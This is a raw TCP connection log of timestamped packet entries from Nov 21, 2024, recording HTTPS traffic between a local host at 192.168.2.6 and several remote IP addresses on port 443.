                                                                                                                                                                                                            Nov 21, 2024 15:17:05.667550087 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.668896914 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.668941975 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.668955088 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:05.669003010 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.082122087 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.082149029 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.082195997 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.082232952 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.082252026 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.082285881 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.085647106 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.085690975 CET4434971020.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.085772991 CET49710443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.199136972 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.199157000 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.199234962 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.199235916 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.199297905 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.199297905 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.204116106 CET49711443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:06.204154015 CET4434971120.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.726499081 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.726556063 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.726659060 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.737440109 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:08.737462997 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.125098944 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.125148058 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.125310898 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.129178047 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:09.129190922 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.445050955 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.445133924 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.451175928 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.451189041 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.451625109 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.499490023 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.541991949 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.542042971 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.542299032 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.757216930 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.757299900 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.761740923 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.761787891 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.762128115 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.764277935 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.764455080 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.764467001 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.764770031 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:10.807354927 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.160403967 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.160523891 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.160607100 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.164829016 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.164927959 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.165055990 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.165224075 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.165244102 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.286827087 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.286863089 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.286879063 CET49714443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.286885977 CET44349714188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.530725002 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.546350002 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.612184048 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.612231016 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.612298012 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.612579107 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.612598896 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:11.858870029 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144102097 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144140005 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144192934 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144222021 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144299030 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144378901 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144386053 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144431114 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.144475937 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.147610903 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.147649050 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.147793055 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.147804976 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.148185968 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.148191929 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.679305077 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.679337978 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.679429054 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.680062056 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.680078030 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.880686998 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.880770922 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.882524014 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.882534981 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.882788897 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.884176016 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.884227037 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:12.884253025 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.583930016 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.583971024 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584000111 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584022999 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584022999 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584048033 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584060907 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584086895 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584153891 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.584161997 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.594990015 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.595066071 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.595077038 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.603852987 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.603904009 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.603920937 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.655726910 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.734180927 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.780751944 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.785556078 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.789793015 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.789846897 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.789880037 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.789900064 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.789951086 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.790043116 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.790060043 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.790075064 CET49715443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.790082932 CET44349715188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.884169102 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.884275913 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.896675110 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.896797895 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.917532921 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.917561054 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.917962074 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:13.918011904 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.010526896 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.010634899 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.203238964 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.203339100 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.212296009 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.212368011 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.213017941 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.213072062 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.218029022 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.218260050 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.223690987 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.223712921 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.223988056 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.224030018 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.224612951 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.224636078 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.325124979 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.325207949 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.389492989 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.389539003 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.389689922 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.390037060 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.390057087 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.403605938 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.403683901 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.405456066 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.405466080 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.405716896 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.415153027 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.459326029 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713038921 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713061094 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713100910 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713129997 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713144064 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713151932 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713166952 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.713188887 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.715279102 CET49716443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.715300083 CET4434971620.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.794945955 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.794972897 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.794990063 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.795015097 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.795053959 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.795064926 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.795106888 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856858015 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856883049 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856914997 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856930017 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856956005 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856981039 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.856986046 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.857023954 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.857047081 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.857083082 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.857774019 CET49717443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.857786894 CET4434971720.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.888972998 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.888993979 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.889009953 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.889053106 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.889071941 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.889113903 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.889130116 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.958039999 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.958123922 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.958261013 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.958348036 CET4434971820.223.35.26192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:14.958399057 CET49718443192.168.2.620.223.35.26
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.059988022 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.060012102 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.060050964 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.060060024 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.060089111 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.060102940 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.104382038 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.104402065 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.104460001 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.104469061 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.104505062 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.233432055 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.233478069 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.233541965 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.233577967 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.233609915 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.233638048 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.260068893 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.260096073 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.260165930 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.260193110 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.260219097 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.260236979 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.279162884 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.279187918 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.279236078 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.279261112 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.279287100 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.279300928 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.297904968 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.297949076 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.297980070 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.298001051 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.298046112 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.298064947 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.421277046 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.421319008 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.421425104 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.421442986 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.421489000 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.436624050 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.436645031 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.436717033 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.436728001 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.436769009 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.448103905 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.448123932 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.448184967 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.448208094 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.448267937 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.462336063 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.462353945 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.462416887 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.462441921 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.462486982 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476530075 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476551056 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476602077 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476625919 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476640940 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476644039 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476663113 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.476696968 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.481293917 CET49719443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.481309891 CET4434971913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.548213959 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.548260927 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.548463106 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.554208040 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.554311037 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.554492950 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.555146933 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.555170059 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.557482004 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.557499886 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.558824062 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.558840990 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:15.558964968 CET49723443192.168.2.613.107.246.45
